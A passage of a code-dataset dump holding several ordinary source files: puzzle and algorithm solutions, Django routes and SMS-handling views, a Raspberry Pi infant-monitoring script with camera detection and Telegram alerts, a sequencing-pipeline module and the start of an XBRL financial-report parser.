str(c)), (str(c), j),\n                                      (i // region_size, j // region_size,\n                                       str(c)))).values(),\n        default=0) <= 1\n\n\nsudoku = [\n    [5, 3, 0, 0, 0, 0, 0, 0, 0],\n    [6, 0, 0, 1, 9, 5, 0, 0, 0],\n    [0, 9, 8, 0, 0, 0, 0, 6, 0],\n    [8, 0, 0, 0, 6, 0, 0, 0, 3],\n    [4, 0, 0, 8, 0, 3, 0, 0, 1],\n    [7, 0, 0, 0, 2, 0, 0, 0, 6],\n    [0, 6, 0, 0, 0, 0, 2, 8, 0],\n    [0, 0, 0, 4, 1, 9, 0, 0, 5],\n    [0, 0, 0, 0, 8, 0, 0, 7, 9]\n]\n\n# print(is_valid_sudoku(sudoku))\nprint(is_valid_sudoku_pythonic(sudoku))","sub_path":"Python/EPI/Arrays/is_valid_sudoku.py","file_name":"is_valid_sudoku.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"338042761","text":"t1, t2 = [ int(v) for v in input().split() ]\na1, a2 = [ int(v) for v in input().split() ]\nb1, b2 = [ int(v) for v in input().split() ]\n\nif a1*t1 + a2*t2 == b1*t1 + b2*t2:\n    ans = -1\nelse:\n    if a1*t1 + a2*t2 < b1*t1 + b2*t2:\n        a1, b1 = b1, a1\n        a2, b2 = b2, a2\n\n    mind = a1*t1 - b1*t1\n    if mind > 0:\n        ans = 0\n    else:\n        lastd = a1*t1 + a2*t2 - b1*t1 - b2*t2\n        mind = abs(mind)\n        if mind % lastd == 0:\n            ans = 2 * (mind // lastd) \n        else:\n            ans = 2 * (mind // lastd) + 1\n    \nprint(ans if ans != -1 else \"infinity\")","sub_path":"Python_codes/p02846/s465327655.py","file_name":"s465327655.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"564275960","text":"from django.conf.urls import include, url\nfrom rest_framework.routers import DefaultRouter\n\nfrom . 
import api, views\n\nrouter = DefaultRouter()\nrouter.register(r\"assessment\", api.EpiMetaAssessmentViewset, basename=\"assessment\")\nrouter.register(r\"protocol\", api.MetaProtocol, basename=\"protocol\")\nrouter.register(r\"result\", api.MetaResult, basename=\"result\")\n\n\napp_name = \"meta\"\nurlpatterns = [\n # API\n url(r\"^api/\", include((router.urls, \"api\"))),\n # protocol views\n url(\n r\"^study/(?P\\d+)/protocol/create/$\",\n views.MetaProtocolCreate.as_view(),\n name=\"protocol_create\",\n ),\n url(r\"^protocol/(?P\\d+)/$\", views.MetaProtocolDetail.as_view(), name=\"protocol_detail\",),\n url(\n r\"^protocol/(?P\\d+)/update/$\",\n views.MetaProtocolUpdate.as_view(),\n name=\"protocol_update\",\n ),\n url(\n r\"^protocol/(?P\\d+)/delete/$\",\n views.MetaProtocolDelete.as_view(),\n name=\"protocol_delete\",\n ),\n # result views\n url(r\"^assessment/(?P\\d+)/results/$\", views.MetaResultList.as_view(), name=\"result_list\",),\n url(\n r\"^protocol/(?P\\d+)/result/create/$\",\n views.MetaResultCreate.as_view(),\n name=\"result_create\",\n ),\n url(\n r\"^protocol/(?P\\d+)/result/copy-as-new-selector/$\",\n views.MetaResultCopyAsNew.as_view(),\n name=\"result_copy_selector\",\n ),\n url(r\"^result/(?P\\d+)/$\", views.MetaResultDetail.as_view(), name=\"result_detail\"),\n url(r\"^result/(?P\\d+)/update/$\", views.MetaResultUpdate.as_view(), name=\"result_update\",),\n url(r\"^result/(?P\\d+)/delete/$\", views.MetaResultDelete.as_view(), name=\"result_delete\",),\n]\n","sub_path":"hawc/apps/epimeta/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"562433786","text":"# USAGE\n#python3 smartmobile_first_client.py --prototxt MobileNetSSD_deploy.prototxt --model MobileNetSSD_deploy.caffemodel\n\n\n# import the necessary packages\nfrom imutils.video import VideoStream\nfrom imutils.video import FPS\nfrom gpiozero import Buzzer\nfrom time import sleep\nimport socket\nimport numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport serial\nimport datetime\nimport os\nimport telepot\n\nimport RPi.GPIO as GPIO\n\nport = 8888\nclient_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient_socket.connect((\"SERVER ADDRESS\", port))\nclient_socket.send(\"first\".encode())\n#텔레그램 봇 토큰과 봇 생성\nmy_token = 'INSERT TELEGRAM BOT TOKEN'\nbot = telepot.Bot(my_token)\n\ntelegram_id = 'INSERT TELEGRAM ID'\nos.system(\"sudo rfcomm bind rfcomm0 BLUETOOTH ADDRESS\")\n#경고 메세지\nmsg_face = '뒤집힘 경고'\nmsg_object = '관심영역 경고'\n\n#GPIO input/output 설정\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(17, GPIO.IN, pull_up_down=GPIO.PUD_UP)\n\n#부저 생성\nbuzzer = Buzzer(3)\n\n#현재 시간을 초로 계산하여 반환\ndef total():\n now = datetime.datetime.now()\n nowTuple = now.timetuple()\n total_sec = nowTuple.tm_sec +(nowTuple.tm_min*60) + (nowTuple.tm_hour*3600) + (nowTuple.tm_mday * 3600 * 24) + (nowTuple.tm_mon * 3600 * 24 * nowTuple.tm_mday) + (nowTuple.tm_year * 3600 * 24 * 365.25)\n\n return int(total_sec)\n\n\n# construct the argument parse and parse the arguments\n#ap = argparse.ArgumentParser()\n#ap.add_argument(\"-p\", \"--prototxt\", required=True,\n#\thelp=\"path to Caffe 'deploy' prototxt file\")\n#ap.add_argument(\"-m\", \"--model\", required=True,\n#\thelp=\"path to Caffe pre-trained model\")\n#ap.add_argument(\"-c\", \"--confidence\", type=float, default=0.2,\n#\thelp=\"minimum probability to filter weak detections\")\n#ap.add_argument(\"-u\", \"--movidius\", type=bool, 
default=0,\n#\thelp=\"boolean indicating if the Movidius should be used\")\n#args = vars(ap.parse_args())\n\n\n\n# initialize the list of class labels MobileNet SSD was trained to\n# detect, then generate a set of bounding box colors for each class\n\nIGNORE = set([\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n \"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n \"dog\", \"horse\", \"motorbike\", \"pottedplant\", \"sheep\",\n \"sofa\", \"train\", \"tvmonitor\"])\n\n\nCLASSES = [\"background\", \"aeroplane\", \"bicycle\", \"bird\", \"boat\",\n\t\"bottle\", \"bus\", \"car\", \"cat\", \"chair\", \"cow\", \"diningtable\",\n\t\"dog\", \"horse\", \"motorbike\", \"person\", \"pottedplant\", \"sheep\",\n\t\"sofa\", \"train\", \"tvmonitor\"]\n##------edited COLORS = np.random.uniform(0, 255, size=(len(CLASSES), 3))\n\n\n\n# load our serialized model from disk\nprint(\"[INFO] loading model...\")\n#people_net = cv2.dnn.readNetFromCaffe(args[\"prototxt\"], args[\"model\"])\npeople_net = cv2.dnn.readNetFromCaffe(\"/home/pi/infant_accident_prevention_system_development/MobileNetSSD_deploy.prototxt\",\"/home/pi/infant_accident_prevention_system_development/MobileNetSSD_deploy.caffemodel\")\nface_net = cv2.dnn.readNetFromCaffe(\"/home/pi/infant_accident_prevention_system_development/deploy.prototxt.txt\",\"/home/pi/infant_accident_prevention_system_development/res10_300x300_ssd_iter_140000.caffemodel\")\n\nfps = FPS().start()\n#vs = VideoStream(src=0).start()\n#USE WebCam\n\nframe = 0\n\n# specify the target device as the Myriad processor on the NCS\npeople_net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)\nface_net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)\n# initialize the video stream, allow the cammera sensor to warmup,\n# and initialize the FPS counter\n\n#----------------------------------------------------------------------------------------\n#print(\"[INFO] starting video stream...\")\n\n\n#vs = VideoStream(usePiCamera=True).start()\nvs = cv2.VideoCapture(2, cv2.CAP_V4L)\n\n#time.sleep(2.0)\n#fps = FPS().start()\n\n\ndef total():\n now = datetime.datetime.now()\n nowTuple = now.timetuple()\n total_sec = nowTuple.tm_sec +(nowTuple.tm_min*60) + (nowTuple.tm_hour*3600) + (nowTuple.tm_mday * 3600 * 24) + (nowTuple.tm_mon * 3600 * 24 * nowTuple.tm_mday) + (nowTuple.tm_year * 3600 * 24 * 365.25)\n\n return int(total_sec)\n\ndef imgprocessing_people():\n # loop over the frames from the video stream\n global frame\n global people_net\n global fps\n global vs\n global CLASSES\n global count\n global buzzer\n\n global serial\n\n global msg_face\n global msg_object\n global bot\n global telegram_id\n global client_socket\n\n ROI_EVENT_FLAG = False\n ROI_EVENT_START_TIME = 0\n ROI_EVENT_START_TIME_FLAG = False\n\n\n FACE_EVENT_FLAG = False\n FACE_EVENT_START_TIME = 0\n FACE_EVENT_START_TIME_FLAG = False\n\n # loop over the frames from the video stream\n bluetoothSerial = serial.Serial(\"/dev/rfcomm0\", baudrate=9600)\n\n# face_num = 0\n while True:\n if GPIO.input(17) == 0:\n print(\"reset!\")\n ROI_EVENT_FLAG = False\n ROI_EVENT_START_TIME_FLAG = False\n FACE_EVENT_START_TIME_FLAG = False\n buzzer.off()\n\n\t# grab the frame from the threaded video stream and resize it\n\t# to have a maximum width of 400 pixels\n ret, frame = vs.read()\n\n #frame = imutils.resize(frame, width=800)\n\t# grab the frame dimensions and convert it to a blob\n (h, w) = frame.shape[:2]\n#-----------------------------------------------------------------------------\n people_blob = 
cv2.dnn.blobFromImage(frame, 0.007843, (300, 300), 127.5)\n face_blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,(300, 300), (104.0, 177.0, 123.0))\n # pass the blob through the network and obtain the detections and\n\t# predictions\n people_net.setInput(people_blob)\n people_detections = people_net.forward()\n\n face_net.setInput(face_blob)\n face_detections = face_net.forward()\n\n line_left_topx = 100\n line_left_topy = 50\n line_right_botx = 500\n line_right_boty = 550\n weight = 10\n cv2.rectangle(frame, (line_left_topx, line_left_topy), (line_right_botx, line_right_boty),(255,255,255), 2)\n ROI_EVENT_FLAG = True\n\t# loop over the detections\n for i in np.arange(0, people_detections.shape[2]):\n people_confidence = people_detections[0, 0, i, 2]\n #print(people_idx)\n #print(CLASSES[people_idx])\n people_idx = int(people_detections[0, 0, i, 1])\n if CLASSES[people_idx] in IGNORE:\n continue\n\n if people_confidence > 0.2:\n #people_idx = int(people_detections[0, 0, i, 1])\n #print(people_idx)\n #print(CLASSES[people_idx])\n #if CLASSES[people_idx] in IGNORE:\n # continue\n\n people_box = people_detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (people_startX, people_startY, people_endX, people_endY) = people_box.astype(\"int\")\n\n #영역 이탈 감지\n if people_startX < line_left_topx+weight or people_endX > line_right_botx-weight or people_startY < line_left_topy+weight or people_endY > line_right_boty-weight:\n print('ROI WARNING')\n ROI_EVENT_FLAG = True\n\n else :\n\n print('ROI_safety')\n ROI_EVENT_FLAG = False\n\n\n cv2.rectangle(frame, (people_startX, people_startY), (people_endX, people_endY),(255,0,0), 2)\n\n\n if ROI_EVENT_FLAG: #영역 이탈한 경우\n\n if not ROI_EVENT_START_TIME_FLAG: #영역 이탈 첫 발생\n ROI_EVENT_START_TIME = total()\n ROI_EVENT_START_TIME_FLAG = True\n\n else : #이미 영역 이탈 발생\n diff_sec = total() - ROI_EVENT_START_TIME\n print(\"ROI event warning \"+str(diff_sec))\n\n if diff_sec % 2 == 0 : #관심영역 경고 텔레그램 알림\n bot.sendMessage(chat_id = telegram_id, text = msg_object)\n\n if diff_sec >= 5: #관심영역 경고가 5초이상 지속되��을 시 시간에따라 진동 혹은 부저 알림\n #ROI_now = datetime.datetime.now()\n #ROI_event_time = ROI_now.replace(hour=10, minute=59, second=0,microsecond=0)\n #if ROI_now > ROI_event_time: #기준점과 시간 비교\n # buzzer.off()\n # bluetoothSerial.write(str(\"w\").encode('utf-8'))\n #else:\n # buzzer.on()\n bluetoothSerial.write(str(\"w\").encode('utf-8'))\n\n else : #영역 이탈 정상 경우\n ROI_EVENT_START_TIME_FLAG = False\n\n\n\n face_num = 0\n\n #for i in range(0, face_detections.shape[2]):\n for i in np.arange(0, face_detections.shape[2]):\n face_confidence = face_detections[0, 0, i, 2]\n if face_confidence < 0.25:\n continue\n else:\n face_num += 1\n face_box = face_detections[0, 0, i, 3:7] * np.array([w,h,w,h])\n (face_startX, face_startY, face_endX, face_endY) = face_box.astype(\"int\")\n #face_text = \"{:.2f}%\".format(face_confidence * 100)\n #face_y = face_startY - 10 if face_startY - 10 > 10 else face_startY + 10\n cv2.rectangle(frame, (face_startX, face_startY), (face_endX, face_endY),(0, 0, 255), 2)\n #cv2.putText(frame, face_text, (face_startX, face_y),cv2.FONT_HERSHEY_SIMPLEX, 0.45,(0,0,255),2)\n print(face_num)\n if face_num == 0:\n if not FACE_EVENT_START_TIME_FLAG:\n FACE_EVENT_START_TIME = total()\n FACE_EVENT_START_TIME_FLAG = True\n else :\n diff_sec = total() - FACE_EVENT_START_TIME\n print(\"FACE event warning \"+str(diff_sec))\n if diff_sec % 2 == 0:\n bot.sendMessage(chat_id = telegram_id, text = msg_face)\n if diff_sec >= 5:\n #FACE_now = datetime.datetime.now()\n 
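# NOTE (editor, hedged): the disabled lines here and below appear to gate the\n                        # alarm by time of day, mirroring the ROI branch above -- vibration at\n                        # night, buzzer otherwise. A minimal sketch with a hypothetical 22:00\n                        # cutoff (the cutoff is not part of the original code):\n                        #     if datetime.datetime.now().time() >= datetime.time(22, 0):\n                        #         bluetoothSerial.write(str(\"w\").encode('utf-8'))  # vibrate only\n                        #     else:\n                        #         buzzer.on()  # audible alarm\n                        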
#FACE_event_time = FACE_now.replace(hour=10, minute=59, second=0,microsecond=0)\n #if FACE_now > FACE_event_time:\n # buzzer.off()\n # bluetoothSerial.write(str(\"w\").encode('utf-8'))\n #else:\n # buzzer.on()\n buzzer.on()\n else:\n FACE_EVENT_START_TIME_FLAG = False\n if not ROI_EVENT_FLAG:\n buzzer.off()\n\n\n #cv2.putText(frame, label, (startX, y),\n #cv2.FONT_HERSHEY_SIMPLEX, 0.5, COLORS[idx], 2)\n client_socket.send(\"send\".encode())\n # show the output frame\n cv2.imshow(\"frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n\t# if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\n\t# update the FPS counter\n fps.update()\n\n# stop the timer and display FPS information\n fps.stop()\n print(\"[INFO] elasped time: {:.2f}\".format(fps.elapsed()))\n print(\"[INFO] approx. FPS: {:.2f}\".format(fps.fps()))\n\n# do a bit of cleanup\n cv2.destroyAllWindows()\n vs.stop()\n buzzer.off()\n\n os.system('kill -9 '+str(os.getpid()))\n\nif __name__ == '__main__':\n imgprocessing_people()\n","sub_path":"FIRST_MOBILE/smartmobile_first_client.py","file_name":"smartmobile_first_client.py","file_ext":"py","file_size_in_byte":11280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"162743346","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n def distanceK(self, root, target, K):\n \"\"\"\n :type root: TreeNode\n :type target: TreeNode\n :type K: int\n :rtype: List[int]\n \"\"\"\n res = []\n\n def find_nodes_and_add(node, cur_depth, target_depth):\n if not node:\n return\n if cur_depth == target_depth:\n res.append(node.val)\n return\n find_nodes_and_add(node.left, cur_depth + 1, target_depth)\n find_nodes_and_add(node.right, cur_depth + 1, target_depth)\n\n def dfs(node, cur_depth):\n if not node:\n return False, -1\n if node.val == target.val:\n find_nodes_and_add(node, 0, K)\n return True, 0\n l_has_target, l_target_dis = dfs(node.left, cur_depth + 1)\n r_has_target, r_target_dis = dfs(node.right, cur_depth + 1)\n # print node.val, l_has_target, l_target_dis, r_has_target, r_target_dis\n if not l_has_target and not r_has_target:\n return False, -1\n target_dis = l_target_dis + 1 if l_has_target else r_target_dis + 1\n find_back_dis = K - target_dis\n if find_back_dis < 0:\n return False, -1\n if find_back_dis == 0:\n res.append(node.val)\n return False, -1\n find_back_node = node.left if r_has_target else node.right\n find_nodes_and_add(find_back_node, 0, find_back_dis - 1)\n return True, target_dis\n\n dfs(root, 0)\n\n return res\n","sub_path":"tree/863_all_nodes_distance_k_in_binary_tree.py","file_name":"863_all_nodes_distance_k_in_binary_tree.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406757151","text":"from django.shortcuts import render, HttpResponse, get_object_or_404, redirect, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Message, Phone, Company, PhoneRequest\nfrom django.utils import timezone\nimport redis\nimport json\n\n\ndef startpage(request):\n\treturn render(request, 'smscab/index.html')\n\n@login_required\ndef companyregistration(request):\n\tif request.method == 'POST':\n\t\tnewcompany = 
Company()\n\t\tnewcompany.owner = request.user\n\t\tnewcompany.companyName = request.POST['companyname']\n\t\tnewcompany.save()\n\t\treturn HttpResponseRedirect('/replyroom')\n\telse:\n\t\treturn render(request, 'smscab/company_registration.html')\n\n@login_required\ndef replyroom(request):\n\ttry:\n\t\tcompany = Company.objects.get(owner=request.user)\n\texcept Company.DoesNotExist:\n\t\treturn redirect('company_registration')\n\tcompany = get_object_or_404(Company, owner=request.user)\n\tphones = Phone.objects.filter(company=company)\n\tif not phones:\n\t\tphones = Phone.objects.filter(phoneNumber='79066677358')\n\treturn render(request, 'smscab/cabinet.html', {'phones': phones})\n\n@login_required\ndef messages_lookup(request, pk):\n\tcompany = get_object_or_404(Company, owner=request.user)\n\tphones = Phone.objects.filter(company=company)\n\tif not phones:\n\t\tphone = get_object_or_404(Phone, phoneNumber='79066677358')\n\t\tphones = [phone]\n\telse:\n\t\tphone = get_object_or_404(Phone, pk=pk)\n\tcurphone = phone.phoneNumber\n\tmessages = Message.objects.filter(companyNumber=phone)\n\targs = {\n\t\t'messages': messages,\n\t\t'phones': phones,\n\t\t'phonePK': pk,\n\t\t'curphone': curphone\n\t}\n\treturn render(request, 'smscab/messages_lookup.html', args)\n\n@login_required\ndef settings(request):\n\tif request.method == 'POST':\n\t\tpass\n\telse:\n\t\tcompany = get_object_or_404(Company, owner=request.user)\n\t\tphones = Phone.objects.filter(company=company)\n\t\tphoneRequests = PhoneRequest.objects.filter(company=company)\n\t\targs = {\n\t\t\t\t'phones': phones,\n\t\t\t\t'company': company,\n\t\t\t\t'phoneRequests': phoneRequests\n\t\t\t}\n\t\treturn render(request, 'smscab/settings.html', args)\n\n@login_required\ndef updatephoneinfo(request):\n\tif request.method == 'POST':\n\t\tpk = request.POST['pk']\n\t\tphone = get_object_or_404(Phone, pk=pk)\n\t\tspotname = request.POST['spotname']\n\t\tspotaddress = request.POST['spotaddress']\n\t\tphone.spotName = spotname\n\t\tphone.spotAddress = spotaddress\n\t\tphone.save()\n\treturn HttpResponse('info received')\n\n@login_required\ndef requestnewphone(request):\n\tif request.method == 'POST':\n\t\tspotname = request.POST['spotname']\n\t\tspotaddress = request.POST['spotaddress']\n\t\tphoneRequest = PhoneRequest()\n\t\tphoneRequest.spotName = spotname\n\t\tphoneRequest.spotAddress = spotaddress\n\t\tphoneRequest.company = get_object_or_404(Company, owner=request.user)\n\t\tphoneRequest.requestStatus = 'Заявка принята. 
Менеджер с Вами свяжется в ближайшее время.'\n\t\tphoneRequest.save()\n\t\treturn HttpResponseRedirect('/settings/')\n\telse:\n\t\treturn HttpResponse('Please use POST')\n\n@login_required\ndef companyupdate(request):\n\tif request.method == 'POST':\n\t\tcompany = get_object_or_404(Company, owner=request.user)\n\t\tcompanyName = request.POST['companyname']\n\t\tcompanyAddress = request.POST['contactaddress']\n\t\tcompanyContactName = request.POST['companycontactname']\n\t\tcompanyContactPhone = request.POST['companycontactphone']\n\t\tcompany.companyName = companyName\n\t\tcompany.companyAddress = companyAddress\n\t\tcompany.companyContactName = companyContactName\n\t\tcompany.companyContactPhone = companyContactPhone\n\t\tcompany.save()\n\t\treturn HttpResponseRedirect('/settings/')\n\t\n\n\ndef sitelogin(request):\n\tusername = request.POST['username']\n\tpassword = request.POST['password']\n\tuser = authenticate(username=username, password=password)\n\tif user is not None:\n\t\tif user.is_active:\n\t\t\tlogin(request, user)\n\t\t\treturn redirect('replyroom')\n\t\telse:\n\t\t\treturn HttpResponse('error')\n\telse:\n\t\treturn HttpResponse('error')\n\ndef receivesms(request):\n\tif request.method == 'GET':\n\t\tsms = request.GET.get('m','')\n\t\tclientPhoneNumber = request.GET.get('p','')\n\t\tcompanyPhoneNumber = request.GET.get('c','')\n\t\tcompanyNumber = get_object_or_404(Phone, phoneNumber=companyPhoneNumber)\n\t\tif not Message.objects.filter(clientNumber=clientPhoneNumber, companyNumber=companyNumber):\n\t\t\tMessage.objects.create(\n\t\t\t\tclientNumber=clientPhoneNumber,\n\t\t\t\tcompanyNumber=get_object_or_404(Phone, phoneNumber=companyPhoneNumber),\n\t\t\t\tmessage=sms,\n\t\t\t\tanswers=[])\n\t\telse:\n\t\t\tmessage = get_object_or_404(Message, clientNumber=clientPhoneNumber)\n\t\t\tmessage.message+=sms\n\t\t\tmessage.save()\n\t\tredis_client = redis.Redis()\n\t\tredis_client.publish('broadcast_channel', json.dumps({\"text\": sms}))\n\t\tif sms == '':\n\t\t\treturn HttpResponse('message can not be empty')\n\t\telse:\n\t\t\treturn HttpResponse('message received')\n\telse:\n\t\tHttpResponseRedirect('please use get')\n\ndef replysms(request, pk):\n\tif request.method == 'POST':\n\t\tmessage = get_object_or_404(Message, pk=pk)\n\t\tanswer = request.POST['answer']\n\t\tmessage.answers.append(answer)\n\t\tmessage.save()\n\n\treturn HttpResponseRedirect('/replyroom/')\n\n\n\n\n\n\n","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"463636583","text":"\"\"\"Support integration with Illumina sequencer machines.\n\"\"\"\nimport glob\nimport os\nimport operator\nfrom xml.etree.ElementTree import ElementTree\n\nimport yaml\nimport logbook\n\nfrom bcbio.log import setup_local_logging, logger\nfrom bcbio.illumina import demultiplex, samplesheet\nfrom bcbio.galaxy import nglims\n\n# ## bcbio-nextgen integration\n\ndef check_and_postprocess(args):\n \"\"\"Check for newly dumped sequencer output, post-processing and transferring.\n \"\"\"\n with open(args.process_config) as in_handle:\n config = yaml.safe_load(in_handle)\n setup_local_logging()\n for dname in _find_unprocessed(config):\n runinfo = nglims.get_runinfo(config[\"galaxy_url\"], config[\"galaxy_apikey\"], dname)\n lane_details = nglims.flatten_lane_detail(runinfo)\n fcid_ss = samplesheet.from_flowcell(dname, lane_details)\n fastq_dir = demultiplex.run_bcl2fastq(dname, fcid_ss, config)\n 
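# Editor's note (hedged): a process_config YAML for this loop would carry the\n        # keys this module reads (galaxy_url, galaxy_apikey, msg_db,\n        # dump_directories); the values below are purely illustrative:\n        #     galaxy_url: https://galaxy.example.org\n        #     galaxy_apikey: <api key>\n        #     msg_db: /path/to/transferred_flowcells.db\n        #     dump_directories:\n        #       - /data/sequencer_dumps\n        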
#_update_reported(config[\"msg_db\"], dname)\n\ndef add_subparser(subparsers):\n \"\"\"Add command line arguments for post-processing sequencer results.\n \"\"\"\n parser = subparsers.add_parser(\"sequencer\", help=\"Post process results from a sequencer.\")\n parser.add_argument(\"process_config\", help=\"YAML file specifying sequencer details for post-processing.\")\n return parser\n\n# ## Dump directory processing\n\ndef _find_unprocessed(config):\n \"\"\"Find any finished directories that have not been processed.\n \"\"\"\n reported = _read_reported(config[\"msg_db\"])\n for dname in _get_directories(config):\n if os.path.isdir(dname) and dname not in reported:\n if _is_finished_dumping(dname):\n yield dname\n\ndef _get_directories(config):\n for directory in config[\"dump_directories\"]:\n for dname in sorted(glob.glob(os.path.join(directory, \"*[Aa]*[Xx][Xx]\"))):\n if os.path.isdir(dname):\n yield dname\n\ndef _is_finished_dumping(directory):\n \"\"\"Determine if the sequencing directory has all files.\n\n The final checkpoint file will differ depending if we are a\n single or paired end run.\n \"\"\"\n #if _is_finished_dumping_checkpoint(directory):\n # return True\n # Check final output files; handles both HiSeq and GAII\n run_info = os.path.join(directory, \"RunInfo.xml\")\n hi_seq_checkpoint = \"Basecalling_Netcopy_complete_Read%s.txt\" % \\\n _expected_reads(run_info)\n to_check = [\"Basecalling_Netcopy_complete_SINGLEREAD.txt\",\n \"Basecalling_Netcopy_complete_READ2.txt\",\n hi_seq_checkpoint]\n return reduce(operator.or_,\n [os.path.exists(os.path.join(directory, f)) for f in to_check])\n\ndef _is_finished_dumping_checkpoint(directory):\n \"\"\"Recent versions of RTA (1.10 or better), write the complete file.\n\n This is the most straightforward source but as of 1.10 still does not\n work correctly as the file will be created at the end of Read 1 even\n if there are multiple reads.\n \"\"\"\n check_file = os.path.join(directory, \"Basecalling_Netcopy_complete.txt\")\n check_v1, check_v2 = (1, 10)\n if os.path.exists(check_file):\n with open(check_file) as in_handle:\n line = in_handle.readline().strip()\n if line:\n version = line.split()[-1]\n v1, v2 = [float(v) for v in version.split(\".\")[:2]]\n if ((v1 > check_v1) or (v1 == check_v1 and v2 >= check_v2)):\n return True\n\ndef _expected_reads(run_info_file):\n \"\"\"Parse the number of expected reads from the RunInfo.xml file.\n \"\"\"\n reads = []\n if os.path.exists(run_info_file):\n tree = ElementTree()\n tree.parse(run_info_file)\n read_elem = tree.find(\"Run/Reads\")\n reads = read_elem.findall(\"Read\")\n return len(reads)\n\n# ## Flat file of processed directories\n\ndef _read_reported(msg_db):\n \"\"\"Retrieve a list of directories previous reported.\n \"\"\"\n reported = []\n if os.path.exists(msg_db):\n with open(msg_db) as in_handle:\n for line in in_handle:\n reported.append(line.strip())\n return reported\n\ndef _update_reported(msg_db, new_dname):\n \"\"\"Add a new directory to the database of reported messages.\n \"\"\"\n with open(msg_db, \"a\") as out_handle:\n out_handle.write(\"%s\\n\" % new_dname)\n","sub_path":"bcbio/illumina/machine.py","file_name":"machine.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406042666","text":"\"\"\"xbrl_jpfr\"\"\"\n\nfrom os.path import join as os_join\nfrom os.path import basename as os_basename\nfrom os.path import dirname as os_dirname\nfrom re import match as 
re_match\nfrom collections import OrderedDict\nfrom traceback import format_exc\nfrom dateutil.parser import parse as dateutil_parser_parse\nimport xbrl_namespace\nfrom xbrl_util import get_etree_obj_from_file\n\nclass Parser:\n \"\"\"xbrlファイル解析クラス\"\"\"\n def __init__(self, file, file_data, org_file_name):\n self.file = file\n\n # ファイル名解析\n self.info = self.parse_filename(os_basename(org_file_name))\n if self.info['報告書'] is None:\n # 再解析\n if 'E25850-' in org_file_name:\n self.info = self.parse_filename_e25850(os_basename(org_file_name))\n\n # XBRLファイル読み込み\n self.root = get_etree_obj_from_file(self.file, file_data)\n self.nsmap = self.root.nsmap\n self.ns_prefixes = {v: k for (k, v) in self.nsmap.items()}\n\n # 名前空間 文書情報タクソノミ\n self.ns_di = None\n\n # 名前空間 企業別タクソノミ\n self.ns_self = None\n\n # 名前空間 IFRS\n self.ns_ifrs = None\n\n # 名前空間 その他スキーマ\n self.ns_jpfr_oe = None\n\n # 名前空間 xbrldi\n self.ns_xbrldi = None\n\n # 勘定科目などを定義している名前空間を取得\n ns_list = []\n if self.info['会計基準'] == 'jpfr':\n # 名前空間(NameSpace)の定義を取得\n ns_def = xbrl_namespace.NS_INSTANCE_20130301\n\n for (ns_prefix, namespace) in self.nsmap.items():\n if ns_def['jpfr-di'](namespace):\n ns_list.append((0, namespace))\n self.ns_di = namespace\n elif re_match('^jpfr-t-[a-z]*$', ns_prefix):\n ns_list.append((1, namespace))\n elif ns_def['self'](ns_prefix):\n ns_list.append((2, namespace))\n self.ns_self = namespace\n elif ns_def['jpfr-oe'](namespace):\n self.ns_jpfr_oe = namespace\n\n ns_list.sort(key=lambda x: (x[0], x[1]), reverse=False)\n\n elif self.info['会計基準'] == 'ifrs':\n # 名前空間(NameSpace)の定義を取得\n ns_def = xbrl_namespace.NS_INSTANCE_IFRS_20130301\n\n for (ns_prefix, namespace) in self.nsmap.items():\n if ns_def['ifrs'](namespace):\n ns_list.append((0, namespace))\n self.ns_ifrs = namespace\n elif ns_def['self'](ns_prefix):\n ns_list.append((1, namespace))\n self.ns_self = namespace\n elif ns_def['xbrldi'] == namespace:\n self.ns_xbrldi = namespace\n\n ns_list.sort(key=lambda x: (x[0], x[1]), reverse=False)\n\n else:\n print('会計基準の判定失敗')\n raise\n\n # タグ名/属性名定義\n self.link_schema_ref = '{%s}schemaRef' % ns_def['link']\n self.xlink_href = '{%s}href' % ns_def['xlink']\n self.xbrli_context = '{%s}context' % ns_def['xbrli']\n self.xbrli_entity = '{%s}entity' % ns_def['xbrli']\n self.xbrli_identifier = '{%s}identifier' % ns_def['xbrli']\n self.xbrli_period = '{%s}period' % ns_def['xbrli']\n self.xbrli_start_date = '{%s}startDate' % ns_def['xbrli']\n self.xbrli_end_date = '{%s}endDate' % ns_def['xbrli']\n self.xbrli_instant = '{%s}instant' % ns_def['xbrli']\n self.xbrli_scenario = '{%s}scenario' % ns_def['xbrli']\n self.jpfr_oe_non_consolidated = '{%s}NonConsolidated' % self.ns_jpfr_oe if self.ns_jpfr_oe else None\n self.xbrldi_explicit_member = '{%s}explicitMember' % self.ns_xbrldi if self.ns_xbrldi else None\n self.xsi_nil = '{%s}nil' % ns_def['xsi']\n\n # xsdのファイルパスと名前空間を取得\n self.xsd = 